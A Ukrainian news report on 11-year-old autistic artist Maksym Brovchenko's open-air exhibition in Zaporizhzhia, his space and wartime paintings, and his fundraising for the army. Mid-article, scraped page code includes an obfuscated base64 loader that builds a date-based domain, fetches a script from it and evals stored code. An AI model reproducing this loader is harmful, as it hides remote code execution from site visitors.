У Запоріжжі 11-річний художник-волонтер відкрив свою виставку просто неба (ФОТОРЕПОРТАЖ)

Вчора, 15 червня, у парку поблизу площі Університеської Олександрівського району Запоріжжя юний талановитий художник з Бердянська Максим Бровченко провів відкриття виставки власних робіт. У цьому хлопцеві допомагали мама Оксана Бровченко та співробітники ДСНС у Запорізькій області.

Про це повідомляє кореспондент «Акцента».

Про виставку

Виставку вирішили організувати просто неба, щоб більше людей змогли насолодитися роботами Максима, які тематично були поділені на дві важливі частини. Вони відображають основні теми творчості Космо Макса, такий псевднонім має хлопець. Дійсно, цікавість до космосу юний митець проявляє з перших своїх робіт, які створював під час локдауну у 2019 році.

«Раніше Макс Малював суто космос, але з початку війни він почав малювати реальність. , — розповідає Оксана Бровченко про творчий шлях сина.

Оксана Бровченко

Виставка приурочена для важливої дати для художника. Максим — аутист, а 18 червня відзначають День гордості аутиста, тому і кілька робіт на виставці — художнє дослідження цієї теми.

«Так, Максим — аутист. Це трошечки інший світ, інше сприйняття, але воно дуже цікаве, дуже позитивне. Він відчуває біль і переживання за оточуючих«, — розповідає Оксана Бровченко.

Про дружбу з ДСНС, благодійність і популярність Космо Макса

Окрім тематики космосу Максим часто у творчості рефлексує над життям українців під час війни. Його родину російська агресія змусила тимчасово виїхати із рідного Бердянська: хлопець постійно згадує про рідне місто, а на останній на момент виставки його роботі — декокуповане «Серце Азова».

Крім того, Максим захоплюється мужністю українських військових, рятувальників і волонтерів, часто зображує їх на своїх полонтах, додаючи до образів знайомі пейзажі і незамінну для ЗСУ зброю — «Леопарди» і «Джавеліни».

Картини Максима допомагають ЗСУ не тільки добрим художнім словом, а й гривнею. Хлопець продає свої полотна, виставляє на аукціони, а зібрані кошти перераховує захисникам. Юнак розповів присутнім, що таким чином вже зібрав близько 140 тисяч гривень і на цьому не зупиняється.

Така рефлексія Макима зробила його відомим для широкої публіки. Його картини підписував президент Володимир Зеленський, йому тиснув руку головком Валерій Залужний, його талант високо оцінила Олена Зеленська. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Максиму активно допомагають його друзі із ДСНС у Запорізькій області. Одного разу хлопець створив картину з автомобілем рятувальників, які поспішають на допомогу. Він разом з мамою приніс її до управління ДСНС, що стало стартом взаємних теплих відносин.

«Цю талановиту дитину ми взяли під свій патронат. Як ви бачите, його картини — це просто цілий окремий Всесвіт. Є картини, які Макс намалював саме для нас, тому що мабуть також полюбив нашу службу. І рятувальники люблять Максима, завжди опікуються ним«, —
зазначила головний фахівець відділу зв’язків із ЗМІ та роботи з громадськістю ГУ ДСНС області Юлія Цівірко.

Максим Бровченко і Юлія Цівірко Про творчі моменти

Макс почав свій творчий шлях, навчаючись за роликами в Інтернеті. Першою картиною Макса була планета, але він малюючи стирав пальці до крові, коли розтирав фарби. Тоді хлопець лише знайомився зі світом живопису.

На Максима свого часу дуже вплинули американського художника Боба Росса, дивлячись які він навчався працювати на полотні. Через півтора майбутній митець року знайшов один з головних своїх інструментів — фарбу на основі олії.

«Макс малює завжди тільки вночі, бо він не дуже любить сонячне світло. Може малювати декілька днів поспіль, а може — один раз на місяць», — розповідає мама художника.

Мине певний час і Макс зустріне одного з багатьох своїх друзів, бердянського художника Миколу Рубана, який відмовиться навчати юного митця, щоб не втручатися в його талант і бачення світу. Проте художники все одно спілкувалися і разом малювали все, що що їх оточує.

Наприкінці виставки Максим разом з гостями вирішили створити ще одну картину разом. Кожен з присутніх спробував себе у ролі художника.

Підготував Ігор Гур’єв (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/u-zaporizhzhi-11-richnij-hudozhnik-volonter-vidkriv-svoyu-vistavku-prosto-neba-fotoreportazh/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top